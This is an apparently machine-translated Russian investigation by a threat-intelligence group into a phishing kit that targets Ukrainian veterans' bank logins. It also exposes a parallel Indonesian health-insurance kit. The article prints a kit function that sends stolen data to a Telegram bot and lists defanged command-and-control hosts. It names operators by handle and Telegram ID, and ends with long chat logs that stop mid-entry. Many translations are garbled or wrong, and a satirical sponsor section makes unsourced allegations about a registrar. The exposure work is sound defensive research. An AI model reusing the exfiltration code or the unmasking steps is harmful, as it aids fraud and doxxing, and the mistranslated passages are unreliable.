5
Банки, подвергшиеся атаке
6
Вызовы API для снятия маскировки
2
Параллельные фишинговые проекты
<30
Всего несколько минут до полного анализа
Информация о спонсорах(нажмите, чтобы развернуть)
Представляем официального спонсора данного расследования
🏆 NICENIC International Group Co., Limited 🏆
Самый авторитетный регистратор, который сотрудничает с Netcraft (обманывая их систему) · Официальный поставщик доменов для Наркоторговая площадка Kraken · Поставщик оптовых скидок · Преданный поклонник "Типичный Мошенник" Сообщество в «ВКонтакте» — но до сих пор не приобрел курс по анонимности
200 долларов
Цена в .ru
120₽ реальных
0
Сообщения о нарушениях
выполнен
- Несмотря на то, что автор называет себя «китайцем» (из Гонконга), он родом из Горловка, Донецкая Народная Республика. Китайский логотип носит чисто декоративный характер — как и их Условия предоставления услуг
- Обеспечивает Поддержка русского языка через «ВКонтакте» и Telegram, продает
.ru за 200 долларов, в то время как reg.ru взимает 120₽ (около 1,30 долл.) - Негативные отзывы на Trustpilot, в которых упоминается домены, связанные с рынком наркотиков таинственным образом исчезнуть. Совпадение? Ни в коем случае
- Активный подписчик "Типичный Мошенник" (Типичный мошенник) Сообщество в «ВКонтакте» — когда ваш регистратор подписывается на группы-мошенники, становится ясно, на какую аудиторию он ориентируется
- Сотрудничает с Netcraft ровно настолько, чтобы избежать исключения из списка, при этом сохраняя инфраструктуру для доменов, связанных с фишингом, азартными играми и наркотиками
Meanwhile, on "Типичный Мошенник":
Обещание нашему спонсору: Когда этот пост от «Типичного Мошенника» станет реальностью — а судя по тому, что нам известно, это лишь вопрос когда, а не if — вся наша команда зарегистрируется в «ВКонтакте» и подпишется на группу. Считайте это нашей бурной овацией. 👏
* Это сатира. Компания NiceNIC не спонсировала данное расследование. Однако именно она вызвала необходимость его проведения, отказываясь реагировать на наши сообщения о злоупотреблениях на протяжении более пяти дней. Всё, что указано выше, основано на общедоступной информации и нашем практическом опыте. Прочитайте наше полное расследование о NiceNIC →
Что обнаружила PhishDestroy
20 марта 2026 года система автоматического обнаружения угроз PhishDestroy зафиксировала dopomogvoina[.]sbs — недавно зарегистрированный домен, на котором размещен фишинговый сайт, выдающий себя за «Щит Защитника» («Щит защитника») — поддельный сайт, прикрывающийся деятельностью фонда военной помощи Украине. Сайт ориентирован на украинских ветеранов, раненых в боях и семьи погибших солдат, обещая им государственную финансовую помощь, при этом похищая банковские учетные данные пяти крупнейших банков Украины.
Ниже приводится полный обзор всех фактов, выявленных в ходе нашего автоматизированного анализа: методы социальной инженерии, техническая инфраструктура, система управления операторами в режиме реального времени, а также личности лиц, стоящих за этой схемой.
Оценка воздействия
Этот сайт ориентирован именно на наиболее уязвимые группы населения: ветеранов боевых действий, страдающих посттравматическим стрессовым расстройством, семьи погибших в бою солдат, обращающихся за государственной помощью, а также раненых военнослужащих, вынужденных иметь дело со сложными бюрократическими процедурами. Кража даже одного учетного данного может привести к полному взлому учетной записи в течение нескольких минут.
Раздел 1: Приманка — «Фонд ложной военной помощи»
Домен dopomogvoina[.]sbs была зарегистрирована 20 марта 2026 года посредством NICENIC International Group Co., Limited, регистратор, который, как известно, медленно реагирует на сообщения о злоупотреблениях или вообще не реагирует на них. .sbs TLD (Side-By-Side) — это недорогой gTLD, который часто используется для создания одноразовой фишинговой инфраструктуры.
Сайт позиционирует себя как профессиональный портал помощи, связанный с государственными структурами. В верхней части страницы красуется украинский флаг, военная символика придает сайту достоверности, а текст страницы тщательно составлен на украинском языке с использованием бюрократических формулировок, характерных для официальных государственных программ.
Снимок экрана 5 — Страница фишингового сайта, выдающего себя за «Щит Защитника».
Чтобы укрепить доверие, операторы подделали счетчик статистики, который был размещен на видном месте на главной странице:
- 2 847 заявок — что означает, что тысячи людей уже получили помощь
- Выплачено 47,2 млн ₴ — крупная, но вызывающая доверие фигура в УАГ
- 19 программ — предполагающая проведение комплексной операции с участием нескольких программ
Эти цифры полностью выдуманы и жестко заложены в исходный код страницы без связи с сервером. Они служат единственной цели: создать эффект «социального доказательства», чтобы преодолеть колебания жертвы.
Раздел 2: Ловушка — 5 банков, одна цель
После нажатия кнопки «Подать заявку» жертве открывается экран выбора банка. В качестве вариантов предлагаются пять крупнейших розничных банков Украины, каждый из которых представлен с официальным брендингом и логотипом. Именно на этом этапе социальная инженерия переходит от эмоционального манипулирования к техническому хищению.
Снимок экрана 6 — Экран выбора банка. Каждый вариант ведет к запуску индивидуальной последовательности действий по краже учетных данных.
Анализ пакета JavaScript сайта показал, что у каждого банка есть уникальная многоэтапная последовательность действий по сбору учетных данных, адаптированный с учетом фактического алгоритма аутентификации данного банка:
ПриватБанк
ВходПарольИдентификационный номерSMS
один банковский счет
ВходИдентификационный номерSMSЭлектронная почта
УкрСиббанк
ВходИдентификационный номерSMS
Схема атаки на любой банк выглядит одинаково:
Страница с поддельной информацией о помощи
Выбор банка
Клон страницы входа
Перехват двухфакторной аутентификации
Взлом учетной записи
Снимок экрана 7 — Клонированная страница входа в систему PrivatBank.
Снимок экрана 9 — Клонированная страница входа в систему PUMB.
Скриншот 10 — Полный ход атаки: от поддельной страницы о военной помощи до выбора банка, кражи учетных данных и взлома учетной записи.
Технологический стек: React SPA интерфейс, предоставляемый через CDN Cloudflare, с Express.js бэкэнд, отвечающий за перехват учетных данных. Архитектура React позволяет создавать плавные многоэтапные формы, которые внешне ничем не отличаются от подлинных банковских интерфейсов.
Раздел 3: Управление оператором в режиме реального времени
Это не простой инструмент для сбора учетных данных со статической базой данных. Фишинговый набор включает в себя панель управления WebSocket в режиме реального времени которая позволяет оператору управлять сессией каждой жертвы в режиме реального времени.
Конечная точка WebSocket по адресу wss://dopomogvoina[.]sbs/ws поддерживает следующие типы сообщений:
register — New victim session created
update_user_data — Stolen credentials transmitted to operator
next_step — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question — Operator sends custom prompt to victim
Благодаря этому управлению в режиме реального времени оператор может:
- Принудительно перевести в состояние ожидания — отображать надпись «Обрабатываем вашу заявку...» во время входа в реальный банковский счет жертвы
- Перейти к определенному шагу — повторно запросить SMS-код, если срок действия первого истек
- Показывать поддельные сообщения об ошибках — «Неверный код, введите его заново» для сбора нескольких токенов двухфакторной аутентификации
- Задайте индивидуальные вопросы — запрос даты рождения, номера карты или любых дополнительных данных в ходе сеанса
В чём заключается опасность
Управление оператором в режиме реального времени позволяет обойти средства защиты на основе двухфакторной аутентификации (2FA), основанные на временных ограничениях. Оператор перехватывает SMS-код и использует его в течение срока его действия — как правило, от 30 до 120 секунд — в то время как жертва наблюдает за поддельной анимацией «обработки».
Снимок экрана 8 — Форма ввода номера телефона, используемая для кражи учетных данных.
Снимок экрана 11 — Панель оператора для управления сессиями жертв в режиме реального времени.
Полный перечень данных, похищенных за один сеанс: phone, password, PIN, SMS code, card number, date of birth, и email.
Раздел 4: Что стоит за Cloudflare — два проекта, один сервер
Прокси-сервер Cloudflare скрывает исходный сервер, однако конвейер анализа инфраструктуры PhishDestroy определил истинный IP-адрес исходного сервера: 45.131.214[.]148, размещенный на RapidSeedbox / LeaseWeb в Нидерландах.
Важная деталь: dopomogvoina[.]sbs осуществляется через Cloudflare, скрывая свой IP-адрес. Но наша система также отслеживает hlpforvpeople[.]sbs — связанный домен, зарегистрированный через того же регистратора NICENIC с совпадающими шаблонами. Этот домен — НЕ за Cloudflare, прямо раскрывая свой IP-адрес: 45.131.214[.]148.
Прямое подключение к этому IP-адресу — без Host заголовок — показал нечто неожиданное: совершенно другой фишинговый сайт. Вместо украинской военной помощи по умолчанию обслуживался виртуальный хост «Медицинская карта»— фишинговая операция, направленная на пользователей медицинского страхования в Индонезии. Тот же сервер, совершенно другие жертвы, совершенно другая страна.
Тот же сервер, те же операторы, другие жертвы
- Проект 1: Украинская военная помощь → крадет банковские учетные данные у ветеранов
- Проект 2: Индонезийская система медицинского страхования → похищает медицинские данные граждан
- Тот же стек Express.js, та же панель управления в режиме реального времени на базе WebSocket
- Тот же интерфейс управления сервером BT-Panel (宝塔)
- Домен C2 второго проекта:
rezervtemka[.]cc — известная фишинговая панель, зафиксированная в базе данных угроз PhishDestroy - Комментарии на русском языке в исходном коде индонезийского проекта подтверждают те же разработчики из стран СНГ
Снимок экрана 12 — Две параллельные фишинговые операции, использующие один и тот же сервер происхождения: украинская военная помощь (dopomogvoina) и индонезийское медицинское страхование (HealthCare ID).
Шаблон фишингового письма из Индонезии представляет собой известный набор, отслеживаемый в базе данных PhishDestroy по анализу угроз. Мы наблюдали, как различные варианты именно этого шаблона использовались по всей Юго-Восточной Азии — в атаках на финансовые учреждения Индонезии, Таиланда и Вьетнама. Злоумышленники просто заменяют шаблоны, адаптированные под конкретную страну, при этом продолжая использовать одну и ту же серверную инфраструктуру.
Безразборные преступники
Вот какова реальность современных фишинговых атак:
операторам всё равно, у кого они воруют. Украинские ветераны, обращающиеся за военной помощью, индонезийские рабочие, покупающие медицинскую страховку — цель меняется в зависимости от того, какой шаблон приносит наибольший доход. Одни и те же русскоязычные операторы ведут обе кампании одновременно с одного сервера, переключаясь между жертвами в разных странах, как между телеканалами. Сегодня это украинские банки. Завтра это могут быть израильские банки — как уже спрашивал Боня в марте 2026 года.
Раздел 5: Файл config.json, раскрывший все
Вот как один-единственный файл с неправильными настройками привел к срыву всей операции — шаг за шагом.
После определения второго проекта исходного сервера PhishDestroy JS-анализатор — наш инструмент для автоматического анализа JavaScript — был нацелен на набор файлов индонезийского фишингового сайта по адресу https://45.131.214[.]148/assets/index-ZMQxHb_h.js. Анализатор извлек все конечные точки API, внешние URL-адреса и пути к файлам конфигурации из JavaScript-файла размером 335 КБ. Среди обнаруженных данных:
- Пять конечных точек API по адресу
rezervtemka[.]cc — панель C2 для проверки учетных данных - Соединение WebSocket с
wss://rezervtemka[.]cc - Интеграция Facebook Pixel для отслеживания жертв
- Ссылка на
/config.json — загружается во время выполнения для настройки бота в Telegram
Следуя этой подсказке, мы получили /config.json с исходного IP-адреса. Доступ к файлу был возможен без какой-либо аутентификации — он находился в корневом каталоге веб-сайта и был доступен для чтения любому пользователю:
async function loadConfig() {
const response = await fetch('/config.json');
// ...
}
async function sendNotification() {
const cfg = await loadConfig();
await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
method: 'POST',
body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
});
}
Этот /config.json доступ к файлу был возможен напрямую с исходного IP-адреса — без аутентификации, без контроля доступа — просто обычный файл JSON, расположенный в корневом каталоге веб-сайта:
{
"bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"chat_id": "-100XXXXXXXXXX"
}
Токен бота в Telegram одновременно является и именем пользователя, и паролем. Любой, у кого есть этот токен, может отправлять запросы к API от имени этого бота. Операторы оставили свои токены в общедоступном файле. Через шесть вызовов API у нас было всё:
getMe — Идентификатор бота: «MonettiCRM» (@MonettiCRM_bot)
Получить чат по идентификатору чата. — Название группы: «Idr card» с активной ссылкой для приглашения
getChatАдминистраторы — 3 администратора, включая создателя группы
getChat(creator_id) — Автор: @monettiescobar, Telegram Premium, бизнес-профиль, часовой пояс UTC+3
getChat(admin2_id) — Второй администратор: пустой профиль, подозрение на альтернативный аккаунт
получить количество участников чата — Всего 5 участников в группе операторов
Скриншот 13 — Полная цепочка OSINT: от утечки файла config.json до полной идентификации оператора за 6 вызовов API.
От одного неправильно настроенного файла до полной идентификации оператора за шесть HTTP-запросов. Никаких уязвимостей, никакого несанкционированного доступа — всего лишь стандартные вызовы API бота Telegram с использованием токена, который сами операторы оставили открытым.
Раздел 6: Операторы
Заметка о преступном творчестве
Ниже приведен настоящий мастер-класс по выбору ужасных псевдонимов. У нас есть МОНЕТТИ ЭСКОБАР — ведь ничто так не говорит о «незаметности», как выбор в качестве названия имени самого известного наркобарона в истории. А еще есть Не торопись, также известный как Отец права (буквально «папочка-вор по закону» — неудачная отсылка к российской криминальной иерархии), Хорошо, и бубулик. И, наконец, Девойс, чей ник @devosus Звучит подозрительно похоже на «dev ops us» — разработчик, который указал свою должность в имени пользователя. Это те люди, которые думали, что смогут перехитрить автоматизированную систему анализа угроз. Спойлер: у них не получилось.
Скриншот 14 — Группа операторов Telegram «Idr card», раскрытая благодаря утечке токена бота.
Владелец / Создатель
МОНЕТТИ ЭСКОБАР
@monettiescobar
Идентификатор в Telegram: 8135223234
Telegram Premium, Профиль для бизнеса
Часовой пояс: UTC+3 (регион СНГ)
10 публичных сообщений — строгий режим безопасности операций
Чат TraFFeeQМедуза Google AdsКанал «Дипфейки»
Оператор / Диспетчер
Не торопись
Доброе утро
Идентификатор в Telegram: 6242202706
Также известен как: PapaZakonVor, Boa, bubullikk
261 сообщение в 12 группах
DC2 — Амстердам, Нидерланды
CryptoGrabРынок STYXУровень CCEMPIRE CHATРешение Phoenix
Разработчик / Программист
Девойс
@devosus
Идентификатор в Telegram: 8213612730
Разработчик фишингового набора — операторы называют его «кодером»
В случае обнаружения взлома следует «подумать о мерах защиты»
Минимальное воздействие на окружающую среду благодаря специальной конструкции
Купить @devosus ≈ «dev ops us» — должность в качестве имени пользователя
Разработчик набораИнфраструктураБезопасность
МОНЕТТИ ЭСКОБАР — Босс
MONETTI соблюдает строгие меры операционной безопасности — только 10 публичных сообщений по 2 группам. Но эти группы говорят сами за себя: Чат TraFFeeQ (арбитраж трафика с целью мошенничества), Медуза Google Ads (черная оптимизация Google Ads) и Канал «Дипфейки». В его бизнес-профиле в Telegram указано «Есть предложение» («У меня есть предложение») — открыто рекламирующие свои услуги. Часовой пояс UTC+3 (соответствующий Москве, Минску и Киеву) и круглосуточный режим работы свидетельствуют о том, что компания базируется в странах СНГ и работает без перерыва.
Бонья — Беспечный
В отличие от тщательной меры безопасности MONETTI, Бонья (прежний псевдоним: Отец права — что-то вроде «Папа-вор по закону») оставил за собой огромный цифровой след — 261 сообщение в 12 подпольных группах. Его история чатов читается как криминальное резюме:
Слова самого Бони (перевод с русского)
- «ставки ниже 2,0» → «Просто фишинг [банковской безопасности] версии 2.0» — обсуждение совместимости фишинговых наборов с новыми системами безопасности банков
- "Хороших дропов тяжело найти" → «Хороших «денежных мулов» найти трудно» — поиск сообщников для вывода денег
- "Пошли в кц ко мне работать" → «Приходи работать в мой колл-центр» — набор операторов
- "а есть тут люди кто с банками израиля работал?" → «Есть ли здесь кто-нибудь, кто работал с израильскими банками?» — расширение деятельности на новые рынки (март 2026 г.)
- "Логов по финке чет не вижу особо" → «Не вижу много финансовых отчетов» — обсуждение качества похищенных учетных данных
- "Если 1 прокси 1-2 банка ток" → «Один доверенный представитель только для 1–2 банков» — обсуждение мер оперативной безопасности в связи с банковским мошенничеством
- "у нее картку зажевал банкомат" → «Ее карту заглотил банкомат» — «денежный мул» похитил у них 60 000 ₴, сославшись на то, что банкомат проглотил карту. Даже преступники попадают в ловушку своих собственных сообщников.
Его членство в различных организациях дает полное представление о нем: CryptoGrab (хакеры, крадущие средства с криптовалютных кошельков), Рынок STYX (подпольный рынок украденных данных), Проверка уровня CC (инструменты проверки кредитных карт), EMPIRE CHAT и Решение Phoenix (координация мошеннических действий). Это не случайный преступник — это человек, глубоко вовлечённый в экосистему киберпреступности.
Devoys — разработчик
Техническая основа всей операции. По замыслу — минимальное внешнее присутствие: когда группу взломали, Боня прямо обратился к нему: "@devosus подумай над защитой пока нам жопу не порвали" — «@devosus, давай подумаем о защите, пока нас не разгромили». Его саркастическая реакция на этот инцидент — "когда в интерпол" («Когда проводить интерполяцию») — свидетельствует о том, что это не первый случай, когда они едва избежали беды.
Анализ поведения: расшифровка 261 сообщения
Конвейер OSINT от PhishDestroy собрал и перевел все 261 публичное сообщение от Бони из 12 подпольных групп в Telegram (июнь 2024 г. — март 2026 г.). Машинный перевод с помощью API DeepL с ручной корректировкой с учетом контекста. Сообщения раскрывают полную картину деятельности — ниже они сгруппированы по видам преступной деятельности.
Рассылка сообщений: 261 сообщение в 12 группах
- 💬ONE|Чат — 91 сообщение (координация мошеннических действий)
- Актуальное/верификации — 37 сообщений (мошенничество с подтверждением)
- Rolex | общий чат — 28 сообщений (кардинг)
- EMPIRE CHAT — 24 сообщения (черный рынок)
- Фбстор — 23 сообщения (арбитраж трафика)
- Документ Facebook — 22 сообщения (мошенничество в рекламе)
- Решение Phoenix — 17 сообщений (банковское мошенничество)
- CryptoGrab — 11 сообщений (сброс криптовалюты)
- Рынок STYX — 2 сообщения (подпольный рынок)
- Проверка уровня CC — 2 сообщения (проверка карты)
Банковское мошенничество и фишинг
💬ONE|ЧатМарт 2025 года
«Здесь всего 2,0 фиша»
А тут фиши под 2.0 ток
Обсуждение совместимости фишинговых наборов с новыми протоколами безопасности банков
💬ONE|ЧатМарт 2025 года
«Брат, здесь на Phish ничего не продают, это сайт для оплаты»
Братан тут не продают ниче на фишах тут фиш на оплату
Различие между фишингом с целью продажи данных и фишингом с целью непосредственного хищения
Решение PhoenixПо состоянию на 2026 год
«Есть ли здесь кто-нибудь, кто работал с банками в Израиле?»
а есть тут люди кто с банками израиля работал?
Расширение деятельности в банковском секторе Израиля — за 5 дней до начала нашего расследования
Rolex | общий чатСентябрь 2024 года
«Если один представитель, то только 1–2 банка»
Если 1 прокси 1-2 банка ток
Меры операционной безопасности при мошенничестве с участием нескольких банков: использование одного прокси-сервера на 1–2 банка для предотвращения обнаружения
Rolex | общий чатСентябрь 2024 года
«Не вижу там почти никаких финансовых отчетов»
Логов по финке чет не вижу особо
Жалобы на качество похищенных банковских учетных данных на теневых рынках
«Денежные мулы» и вывод средств
💬ONE|ЧатМарт 2025 года
«Хорошие капли найти трудно»
Хороших дропов тыжело наити
«Дропы» — это «денежные мулы», которые обналичивают похищенные средства. Жалуются на сложности с набором персонала.
💬ONE|ЧатМарт 2025 года
«Приходи работать в мой колл-центр»
Пошли в кц ко мне работать
Активный набор сотрудников для работы в мошенническом колл-центре
АктуальноеИюнь 2024 года
«У нас украли 60 тысяч»
у нас украли 60к
«Денежный мул» украл 60 000 песо у самих мошенников. Ирония судьбы.
АктуальноеИюнь 2024 года
«Как, блядь, банкомат мог проглотить карту?»
Как блять банкомат мог карту зажевать
Мошенник утверждал, что банкомат «проглотил» карту, чтобы оставить себе украденные деньги. Мошенники обманывают мошенников.
АктуальноеИюнь 2024 года
«Она перевела нам деньги, но у нас не было основного канала для их перевода»
она ее перекинула на нас а тут у нас небыло основного дропа чтобы перевести деньги
Описание цепочки вывода средств: жертва → счет посредника → основной «денежный мул»
Мошенничество с трафиком и злоупотребление рекламой
EMPIRE CHATПо состоянию на 2026 год
«Я не пользуюсь Google, только Facebook»
Ну я с гуглом не работаю ток с фб
Специализируется на мошенничестве с рекламой в Facebook — привлечении трафика на фишинговые страницы
Документ Facebookфевраль 2026 года
«Я бы тоже не выделил % от рекламного бюджета без поручителя»
я бы тоже не заливал за % от спенда без гаранта
Переговоры об условиях оплаты за проведение мошеннических рекламных кампаний в Facebook
CryptoGrabянварь 2025 года
«Я попробовал использовать AML в Facebook для таргетинга на США — но в интернете не смог найти подходящих настроек»
Я пробовал амл на фб пролить америку тоже толковых даже старых связок не нашел в инете
Попытки использовать рекламу в Facebook для организации мошеннических схем, направленных на борьбу с отмыванием денег и нацеленных на жертв из США
Психологический портрет: Боня
Корпус из 261 сообщения показывает, что киберпреступник среднего звена с разнообразными видами деятельности: банковский фишинг, сети «денежных мулов», мошенничество с рекламой в Facebook, кража криптовалюты и проверка кредитных карт. Основные особенности:
- Небрежность при выполнении служебных обязанностей — 261 сообщение в публичных группах с одного аккаунта. Использование нескольких псевдонимов (PapaZakonVor → Boa → Bonya) свидетельствует о том, что пользователь знает о правилах оперативной безопасности, но не соблюдает их
- Подход к подбору персонала — активно приглашает людей «работать в моем колл-центре» и продает практические знания за деньги
- Безразличие к жертвам — с одинаковой беспристрастностью обсуждает украинские, европейские, израильские и американские цели. География — всего лишь одна из переменных в уравнении мошенничества
- Проблемы с доверием — был предан собственным «денежным мулом» за 60 тысяч песо. Это иронично отражает то недоверие, которое он вызывает у своих жертв
- Ориентированный на расширение — еще в марте 2026 года активно осваивая новые банковские рынки (Израиль), что позволяет предположить, что украинская фишинговая атака — лишь одна из многих параллельно проводимых операций
Bonya: Полный журнал сообщений (253 сообщения в 12 группах)
-- Phoenix Solution (16 сообщений) --
B
Не торопись2026-03-17 14:22
Есть ли здесь кто-нибудь, кто работал с банками в Израиле?а есть тут люди кто с банками израиля работал?
B
Не торопись2026-03-17 14:22
и работает тихо.тоже по тихои работаем
B
Не торопись2026-03-17 14:17
Как дела?как дела
B
Не торопись2026-03-17 14:17
Всем приветвсем привет
B
Не торопись2026-03-15 19:02
Ну, теперь, пожалуй, всё исправлено.Ну в целом все уже наладили
B
Не торопись2026-03-15 19:02
Ну, это немного хлопотноНу так немного гемороя создали
B
Не торопись2026-03-15 19:01
Да, я тоже много работал в тишине, полный провал.Да тоже по тихои работы много заебался
B
Не торопись2026-03-15 19:00
Как прошел твой выходной?Как выходнои прошел
B
Не торопись2026-03-15 19:00
Все вы.Всем общии
B
Не торопись2026-03-14 14:29
Теперь он уже не такой анонимный, ведь все знают, что это Марик.Не такои он уже и анонимныи раз все знают шо жто марик
B
Не торопись2026-03-14 14:24
ВозрождениеПереродился
B
Не торопись2026-03-14 14:24
АхахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахаАхахахахахахахахахаха
B
Не торопись2026-03-14 14:23
Я расстроился, когда увидел, что чат исчез.Я аж расстроился когда увидел шо чат пропал
B
Не торопись2026-03-14 14:22
Я думал, что никогда тебя не найду.Я уж думал не наиду вас
B
Не торопись2026-03-14 14:22
МойКу
B
Не торопись2026-03-14 14:22
БлядьБля
-- 👨⚕️ FB-DOC — Чат по Арбитражу трафика (21 messages) --
B
Не торопись2026-03-15 07:23
@fbdoc21@fbdoc21
B
Не торопись2026-03-15 07:20
Ударь себя членом по лбу.По лбу себе писюном поспамь
B
Не торопись2026-03-06 15:18
Как пять на экране 2,5 дюйма😂.Как пять на скрине 2,5😂
B
Не торопись2026-02-19 17:05
всем вам.с вам всех
B
Не торопись2026-02-19 17:04
Если ты заключишь сделку, я буду смеяться.если откроете сделку я поржу
B
Не торопись2026-02-19 17:04
континентальный?Континентальный?
B
Не торопись2026-02-19 17:04
Вот она.так вон она согласна
B
Не торопись2026-02-19 17:01
Поэтому всегда тщательно проверяйте кандидатов, когда просите их предоставить поручителя.так скриньте всегда когда спрашваиете про гарант
B
Не торопись2026-02-19 17:00
Он спросил о поручителе и сразу же исчез.чет про гаранта спросил и пропал сразу
B
Не торопись2026-02-19 17:00
Это Карина.О, Карина
B
Не торопись2026-02-19 16:59
Так ты собираешься найти поручителя?ну ты на гаранта идешь?
B
Не торопись2026-02-19 16:57
Я бы тоже не стал выделять средства в виде процента от расходов без поручителя.я бы тоже не заливал за % от спенда без гаранта
B
Не торопись2026-02-19 16:57
я?я?
B
Не торопись2026-02-19 16:57
Ну, она выложила скриншоты, а ты мне ничего не дал.ну она кинула скрины а ты ничего не дал
B
Не торопись2026-02-19 16:56
посмотрите на скриншоты, которые она выложилапосмотри скрины что она кинула
B
Не торопись2026-02-19 16:55
он не упомянул о поручителе?он про гаранта не писал?
B
Не торопись2026-02-19 16:54
Ты просто чудак😂ты что, чудак😂
B
Не торопись2026-02-19 16:53
Вы попросили предоставить поручителя.ты гаранта просил
B
Не торопись2026-02-19 16:52
гдев какоми месте
B
Не торопись2026-02-17 14:37
Кто сможет снабдить магазин хорошими автомобилями?Кто подсадет шоп, с хорошими автиками
B
Не торопись2026-02-17 12:10
Где угодно — они сделают это за вас😂В любом где по каифу они тебе сделают😂
-- ЧАТ «ИМПЕРИЯ» (24 сообщения) --
B
Не торопись2026-03-14 13:17
Я уже догадался, как это сделать, но мне лень объяснять.Я уже понял как но лень обьяснять
B
Не торопись2026-03-14 13:17
Он тебя раздавит, что бы ни случилось.Он при любых раскладах тебя наебет
B
Не торопись2026-03-12 17:16
По-разному.По разному
B
Не торопись2026-03-12 17:08
+ к тому же сейчас бушует много штормов.+ щас штормы сильные
B
Не торопись2026-03-12 17:07
Если это черное, то я готов поспоритьЕсли черное то поспорил бы
B
Не торопись2026-03-12 17:07
Зависит от того, какое именно предложение — если оно выгодное, то да.Смотря под какои оффер если белое то да
B
Не торопись2026-03-12 17:06
Это два разных мираДва разных мира это
B
Не торопись2026-03-12 17:06
Больше нет никогоНет вообще другои
B
Не торопись2026-03-12 17:06
Вы можете настроить так, чтобы только ПКТам можно настроить чтобы Только пк были
B
Не торопись2026-03-12 17:05
Google не так эффективен, как я полагаю.Гугл не такои эффективныи как по мне
B
Не торопись2026-03-12 17:05
Ну, я не пользуюсь Google, только Facebook.Ну я с гуглом не работаю ток с фб
B
Не торопись2026-03-12 17:05
Если только вам не придется искать лигатуру на протяжении всего процесса.При условии что еще нужно во воемя все этои залупыи наити связку
B
Не торопись2026-03-12 17:04
Отказы, промахи сыплются как из рога изобилия. И так далее.Реджекты, акки отлетают просо так штормы. И тд
B
Не торопись2026-03-12 17:04
Не всё так радужно, дружище.Не это все братан цветочки
B
Не торопись2026-03-12 17:03
Все регулярные закупки авиабилетов с более высоким уровнем доверияВсе воздух обычные акки с лучшим трастом
B
Не торопись2026-03-12 17:03
На данный момент на рынке нет достойных агентств.Нету хороших агентских щас на рынке
B
Не торопись2026-03-12 17:02
Больше нервирует, чем пугаетСкорее больше нервов чем страшно
B
Не торопись2026-03-12 17:02
Криптовалюта, азартные игры и чернокожесть — все это выплескивается наружуКрипто, гембла нутра, и чернуха все лью
B
Не торопись2026-03-12 17:01
Последним делом город взломал 2d.Поседнее что лезло сити в 2д хавало
B
Не торопись2026-03-12 17:01
Если вы ищете что-то для себя или в рамках бюджета, то для 2D-карабинов потребуется потратить 1–2 тысячи зелей на тестирование, и они прослужат недолго.Лезет если искать я со своих или с бюджета чтобы наити что лезет в 2д нужно 1-2к зела потратить на тесты и то не долго проживет
B
Не торопись2026-03-12 17:00
Я наливаюЯ лью
B
Не торопись2026-03-12 16:59
(поскольку к предложениям от белых таких требований не предъявляется)Потому чтт нету таких требовании на белые офферы)
B
Не торопись2026-02-14 14:33
У кого есть кредит под залог недвижимости с проверкой AML? Только при наличии депозита или готовности поручителяУ кого есть дреинер под амл тест? Только с депом или готовые на гаранта
B
Не торопись2026-01-11 03:14
В группе по Фейсбуку есть один человек, а есть еще один приятель. Нужно пополнить аккаунт в Фейсбуке, цена обсуждаетсяесть кто в фб бил, и есть мат. Нужно фб пополнить по цене договоримся
-- SТYХ СНAT [ STYXMARKET.ST ] (2 сообщения) --
B
Не торопись2025-12-05 12:04
Требуются счета-фактуры, Payzaty, Cashfree, Eportal 3dsТребуются счета-фактуры, Payzaty, Cashfree, Eportal 3ds
B
Не торопись2025-11-22 11:14
есть ли гарант чата?тут есть гарант чата?
-- Чат «Арбитраж трафика» (2 сообщения) --
B
Не торопись2025-11-24 14:50
100 %100 %
B
Не торопись2025-11-24 14:49
Канал Tg будет взломанТг канал угонят
-- Проверка Raven CC (2 сообщения) --
B
Не торопись2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Не торопись2025-11-21 21:18
/проверить/проверить
-- Vision Browser Чат (2 сообщения) --
B
Не торопись2025-11-14 16:47
Спасибо.Спасибо
B
Не торопись2025-11-14 16:47
Вicen работает в Ру?визуальный вок в ру?
-- 💬ONE|Чат (86 сообщений) --
B
Не торопись2025-03-05 17:06
Ребята, подскажите, где можно купить прокладки.Парни даите шоп где площадки взять можно
B
Не торопись2025-03-05 16:22
просто не могу даже притвориться, что у меня манияпросто даже маник дать не может
B
Не торопись2025-03-05 16:22
тожетак же
B
Не торопись2025-03-05 16:21
Блядь, ответь мне, есть ли у наставника чат со студентами или нет.ебать мне кто нибудь ответит есть у наставника чат с учениками или нет
B
Не торопись2025-03-05 16:10
и чей этоа кто тс
B
Не торопись2025-03-05 15:44
Это несложно, но здесь нет полных руководств, только учебные пособия.там не тяжело но мануалов полных тут нету ток у наставников
B
Не торопись2025-03-05 15:42
В принципе, да, если знаешь, как это делается.по сути да если умеешь
B
Не торопись2025-03-05 15:42
полдняпо пол дня
B
Не торопись2025-03-05 15:42
В первом 600 человек, он не отвечает.у первого 600 человек он не отвечает
B
Не торопись2025-03-05 15:41
Если у вас есть деньги, купите тот, который стоит 200 долларов.если бабки есть бери которыи 200$ просит
B
Не торопись2025-03-05 13:55
Кто отлично преподаёт в студенческом чате?Кто у фантастика на обучение там чат учеников есть?
B
Не торопись2025-03-03 15:10
ЧекиЧеки
B
Не торопись2025-03-03 15:10
Тот, что пылесоситКоторая пылесосит
B
Не торопись2025-03-03 15:10
ПонялЕсть
B
Не торопись2025-03-03 15:10
Наверное, есть шлюхи с программным обеспечением.Та тут полюбому шлюх с софтом
B
Не торопись2025-03-03 15:09
Это былоБыло
B
Не торопись2025-03-03 15:09
О, это хорошо.О вот это норм
B
Не торопись2025-03-03 15:09
Трехъярусная башняТринуриует руру
B
Не торопись2025-03-03 15:09
И их собираютА их собирают
B
Не торопись2025-03-03 15:09
Тип просто сидит там и ковыряется в оберткахТип сидит фантики хуярит
B
Не торопись2025-03-03 15:04
Почему здесь есть украинские номерные знаки?П зачем на укр номера
B
Не торопись2025-03-03 15:03
Я сказал: «kc».Я сказал кц
B
Не торопись2025-03-03 15:03
Понял.Я понял
B
Не торопись2025-03-03 15:03
Если это сложно, ты потеряешь свою котелку.Еслм ру сложно тут у тебя котелок слетит
B
Не торопись2025-03-03 15:03
Блин, давай посчитаем, сколько раз ты успеешь прокрутить рекал в Фейсбуке, пока я снимаю соус с огня.Ебать даваи сравник скок ты раз запустишь рекул фб пока я сниму ру
B
Не торопись2025-03-03 15:02
Для сопровожденияНа эскорт
B
